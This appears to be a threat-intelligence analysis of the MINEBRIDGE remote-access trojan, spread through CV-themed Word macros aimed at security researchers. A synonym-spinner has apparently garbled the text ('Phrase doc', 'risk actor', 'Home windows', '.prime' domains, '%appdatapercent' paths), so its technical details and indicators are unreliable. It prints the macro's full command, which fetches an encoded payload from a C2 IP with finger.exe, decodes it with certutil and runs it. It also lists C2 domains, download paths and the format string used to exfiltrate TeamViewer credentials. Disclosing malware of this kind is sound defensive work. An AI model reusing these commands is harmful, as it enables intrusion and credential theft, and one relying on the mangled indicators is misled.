Return of the MINEBRIDGE RAT With New TTPs and Social Engineering Lures

Introduction

In Jan 2021, Zscaler ThreatLabZ found new situations of the MINEBRIDGE remote-access Trojan (RAT) embedded in macro-based Phrase doc information crafted to seem like legitimate job resumes (CVs). Such lures are used as social engineering schemes by risk actors; on this case, the malware was focused at safety researchers.

As soon as triggered, MINEBRIDGE buries itself into the susceptible distant desktop software program TeamViewer, enabling the risk actor to take a wide selection of distant follow-on actions akin to spying on customers or deploying further malware.

We have now not too long ago noticed different situations of risk actors concentrating on safety researchers with social engineering strategies. Whereas the risk actor we talk about on this weblog isn’t the identical, using social engineering techniques concentrating on safety groups seems to be on an upward development.

We additionally noticed just a few modifications within the techniques, strategies, and procedures (TTPs) of the risk actor for the reason that final occasion of MINEBRIDGE RAT was noticed in March 2020. On this weblog, we offer insights into the modifications in TTPs, risk attribution, command-and-control (C&C) infrastructure, and a technical evaluation of the assault circulate.

Menace attribution

This assault was seemingly carried out by TA505, a financially motivated risk group that has been energetic since at the least 2014. TA505 has been beforehand linked to very comparable assaults utilizing MINEBRIDGE RAT. The job resume theme and C&C infrastructure used on this new occasion is constant and in step with these former assaults. As a result of low quantity of samples we recognized for this new assault, we attribute it to the identical risk actor with a reasonable confidence stage.

Assault circulate

Determine 1 under particulars the assault circulate.

Determine 1: Assault circulate

Macro technical evaluation

For the aim of technical evaluation of the assault circulate, we are going to have a look at the macro-based Phrase doc with the MD5 hash: f95643710018c437754b8a11cc943348

When the Phrase doc is opened and the macros are enabled, it shows the message: “File efficiently transformed from PDF” for social engineering functions.

This message is adopted by displaying the decoy doc as proven under. Determine 2 exhibits the contents of the decoy doc which resemble a job resume (CV) of a risk intelligence analyst.

Determine 2: Decoy information utilizing the CV of safety researcher for social engineering functions

The macro code makes use of primary string obfuscation as proven in Determine 3.

Determine 3: Contents of the obfuscated macro

It constructs the next command line after which executes it utilizing Home windows Administration Instrumentation (WMI).

Command line: cmd /C finger nc20@184.164.146.102 > %appdatapercentvUCooUr >> %appdatapercentvUCooUr1 && certutil -decode %appdatapercentvUCooUr1 %appdatapercentvUCooUr.exe &&cmd /C del %appdatapercentvUCooUr1 && %appdatapercentvUCooUr.exe

This command leverages the Home windows utility finger.exe to obtain encoded content material from the IP tackle: 184.164.146.102 and drops it within the %appdata% listing. The encoded content material is decoded utilizing the legit Home windows utility certutil.exe and executed.

The utilization of finger.exe to obtain the encoded content material from the C&C server is among the main TTP modifications by this risk actor.

We see a rise in utilization of living-off-the-land binaries (LOLBins) by the risk actor to obtain, decode, and execute the content material on this new occasion.

Stage 1: SFX archive

MINEBRIDGE makes use of a self-extracting archive (SFX) utilizing certutil.exe with a view to execute. Particulars of this stage of the assault and the malicious binaries used are under.

MD5 hash of SFX archive: 73b7b416d3e5b1ed0aa49bda20f7729a

Contents of the SFX archive are proven in Determine 4. It spoofs a legit TeamViewer software.

Determine 4: Contents of the SFX archive

Upon execution, this SFX archive drops the legit TeamViewer binaries, just a few DLLs and a few doc information.

Execution circulate begins with the binary referred to as defrender.exe, which is masked to look as a Home windows Defender binary.

Stage 2 – DLL Facet Loading

The dropped binary defrender.exe is a legit TeamViewer software model 11.2.2150.0 which is susceptible to DLL aspect loading because of imprecise DLL references within the software’s library manifest. Upon execution, it hundreds the msi.dll binary current in the identical listing. The msi.dll is the file that performs additional malicious exercise within the system.

Subsequent, MSI.dll unpacks a shellcode and executes it. The a part of code liable for shellcode unpacking and execution is proven in Determine 5.

Determine 5: Shellcode unpacking and execution

The shellcode additional unpacks one other DLL with MD5 hash: 59876020bb9b99e9de93f1dd2b14c7e7 from a hardcoded offset, maps it into the reminiscence, and eventually transfers the code execution to its entry level. The unpacked DLL is a UPX-packed binary of MINEBRIDGE RAT.

Stage 3: MINEBRIDGE RAT DLL

On unpacking the UPX layer we get the principle MINEBRIDGE RAT DLL with MD5 hash: 23edc18075533a4bb79b7c4ef71ff314.

Execution checks

On the very starting, MINEBRIDGE RAT confirms that the DLL isn’t executed both through regsvr32.exe or rundll32.exe.

If the command-line argument is __RESTART__ then sleep for five seconds and carry out the operations that are described additional.
If the command-line argument is __START__ then it begins a BITS job to obtain a zipper file-based payload and carry out the operations that are described additional.

Determine 6 exhibits the related command line checks carried out by MINEBRIDGE RAT.

Determine 6: Module identify and command-line argument verify/

BITS Job obtain

The BITS job downloads a zipper file by choosing a random C&C area from the hardcoded checklist contained in the DLL utilizing path “/~4387gfoyusfh_gut/~3fog467wugrgfgd43r9.bin”. The downloaded DLL is dropped to a hardcoded filename “~f834ygf8yrubgfy4sd23.bin” within the %temp% listing. When the obtain is accomplished, the zip file is extracted to “%ProgramDatapercentVolumeDrive”,

Determine 7 exhibits the related code part liable for utilizing bitsadmin to obtain the payload.

Determine 7: BITS job to obtain the payload file and extract it to %ProgramDatapercentVolumeDrive

After performing the above-mentioned checks, it hundreds the legit MSI.dll from %System32% listing to initialize its personal Export Handle Desk operate. That is carried out to forestall software crashes when any of the export features are referred to as. It then generates the BOT_ID after doing a little computations with VolumeSerialNumber.

Determine 8: Export tackle desk initialization and BOT_ID technology

API Hooking

MINEBRIDGE RAT then makes use of the mHook module to hook the next APIs, intercepting operate calls with a view to keep away from unintentional publicity of malicious code execution to the consumer:

MessageBoxA
MessageBoxW
SetWindowTextW
IsWindowVisible
DialogBoxParamW
ShowWindow
RegisterClassExW
CreateWindowExW
CreateDialogParamW
Shell_NotifyIconW
ShellExecuteExW
GetAdaptersInfo
RegCreateKeyExW
SetCurrentDirectoryW
CreateMutexW
CreateMutexA
CreateFileW
GetVolumeInformationW

For the reason that final noticed occasion of this assault in 2020, just a few extra APIs have been added to the hook checklist that are highlighted in daring above — however apparently, the challenge path leaked by the mHook module stays unchanged.

C:usersmaximysdesktoperic_guft@jabbeer.commhook_libmhook_libdisasm-libdisasm.c

Lastly, if all of the APIs are hooked efficiently, MINEBRIDGE RAT creates three threads in a sequence that carry out the next duties:

1. First thread is liable for C&C communication and reaching persistence.

2. Second thread gathers when the final enter was retrieved to verify system idle standing.

3. Third thread kills the ShowNotificationDialog course of commonly to keep away from any notification popups.

Determine 9: Hooks APIs and creates threads

Persistence

For persistence, MINEBRIDGE RAT creates a LNK file with the identify “Home windows Logon.lnk” within the startup listing. The LNK file factors to the at the moment executing binary with icon identical as “wlrmdr.exe” and outline as “Home windows Logon”.

Determine 10: LNK file properties displaying goal path and Icon supply

C&C communication

MINEBRIDGE RAT helps the next C&C instructions:

● drun_command
● rundll_command
● update_command
● restart_command
● terminate_command
● kill_command
● poweroff_command
● reboot_command
● Setinterval_command

On the time of study, we didn’t obtain any energetic response from the C2 server. Nonetheless, based mostly on the code circulate, the communication mechanism appears to be the identical as beforehand reported assault situations. Detailed evaluation of C2 communication may be discovered on this report.

Alternate assault circulate

The MINEBRIDGE RAT DLL additionally has the assist to be executed through regsvr32.exe. The malicious code is current contained in the DllRegisterServer export. When executed through regsvr32.exe or rundll32.exe, the DllMain routine received’t carry out any actions however regsvr32.exe additionally calls DllRegisterServer export implicitly and, therefore, the malicious code inside DllRegisterServer export will get executed.

Apparently, the verify on the very starting of the code inside DllRegisterServer export verifies that the method identify is regsvr32.exe and solely then executes the code additional.

We didn’t see this code path utilizing regsvr32.exe set off within the present assault occasion but it surely matches with what has been reported in earlier situations from FireEye and the advisory report with just a few modifications in filenames and payload listing.

Determine 11: Payload obtain from DllRegisterServer export

Zscaler Cloud Sandbox report

Determine 12 exhibits the sandbox detection for the macro-based doc used within the assault.

Determine 12: Zscaler Cloud Sandbox detection

Along with sandbox detections, Zscaler’s multilayered cloud safety platform detects indicators at numerous ranges.

Win32.Backdoor.MINEBRIDGE
VBA.Downloader.MINEBRIDGE

MITRE ATT&CK TTP Mapping

Tactic

Method

T1566.001

Spearphishing Attachment

Makes use of doc based mostly attachments with VBA macro

T1204.002

Consumer Execution: Malicious File

Consumer opens the doc file and permits the VBA macro

T1547.001

Registry Run Keys / Startup Folder

Creates LNK file within the startup folder for payload execution

T1140

Deobfuscate/Decode Information or Data

Strings and different information are obfuscated within the payloads

T1036.005

Masquerading: Match Reliable Title or Location

File identify used much like legit Home windows Defender binary

T1027.002

Obfuscated Information or Data: Software program Packing

Payloads are packed in layers

T1574.002

Hijack Execution Stream: DLL Facet-Loading

Makes use of legit TeamViewer binary with dll-side loading vulnerability

T1218

Signed Binary Proxy Execution

Makes use of finger.exe for encoded payload obtain and certutil.exe to decode the payload

T1056.002

Enter Seize: GUI Enter Seize

Captures TeamViewer generated UsedID and Password by hooking GUI APIs

T1057

Course of Discovery

Verifies the identify of mother or father course of

T1082

System Data Discovery

Gathers system OS model information

T1033

System Proprietor/Consumer Discovery

Gathers at the moment logged in Username

T1071.001

Software Layer Protocol: Net Protocols

Makes use of https for C&C communication

T1041

Exfiltration Over C&C Channel

Knowledge is exfiltrated utilizing current C2 channel

Indicators of compromise

Doc hashes

f95643710018c437754b8a11cc943348
41c8f361278188b77f96c868861c111e

Filenames

MarisaCV.doc
RicardoITCV.doc

Binary hashes

73b7b416d3e5b1ed0aa49bda20f7729a [SFX Archive]
d12c80de0cf5459d96dfca4924f65144 [msi.dll]
59876020bb9b99e9de93f1dd2b14c7e7 [UPX packed MineBridge RAT]
23edc18075533a4bb79b7c4ef71ff314 [Unpacked MineBridge RAT]

C&C domains

// Under is a complete checklist of C&C domains associated to this risk actor

billionaireshore.prime
vikingsofnorth.prime
realityarchitector.prime
gentlebouncer.prime
brainassault.prime
greatersky.prime
unicornhub.prime
corporatelover.prime
bloggersglobbers.prime
makitof.prime
blackburger.prime

Community paths

// The community paths under are accessed by MineBridge RAT both utilizing HTTP GET or POST requests

/~4387gfoyusfh_gut/~3fog467wugrgfgd43r9.bin
/~8f3g4yogufey8g7yfg/~dfb375y8ufg34gfyu.bin
/~munhgy8fw6egydubh/9gh3yrubhdkgfby43.php

Consumer-agent:

“Mozilla/5.0 (iPhone; CPU iPhone OS 11_1_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Model/11.0 Cellular/15B150 Safari/604.1”

Community information fetch utilizing finger.exe

// Format: username@ip_address

nc20@184.164.146.102

Downloaded information

// Payloads are dropped in following paths

%temp%/~f834ygf8yrubgfy4sd23.bin
%temp%/~t62btc7rbg763vbywgr6734.bin

%appdatapercentvUCooUr1
%appdatapercentvUCooUr.exe
%programdatapercentLocal Temparydefrender.exe
%programdatapercentLocal Temparymsi.dll
%programdatapercentLocal TemparyTeamViewer_Desktop.exe
%programdatapercentLocal TemparyTeamViewer_Resource_en.dll
%programdatapercentLocal TemparyTeamViewer_StaticRes.dll
{STARTUP}Home windows Logon.lnk

Exfiltrated consumer and system information

// Format string

uuid=%s&id=%s&go=%s&username=%s&pcname=%s&osver=%s&timeout=%d

The desk under summarises the which means of particular person fields.

Area identify

Objective

uuid

BOT-ID of the consumer

TeamViewer ID of the consumer

TeamViewer password

username

At the moment logged in consumer identify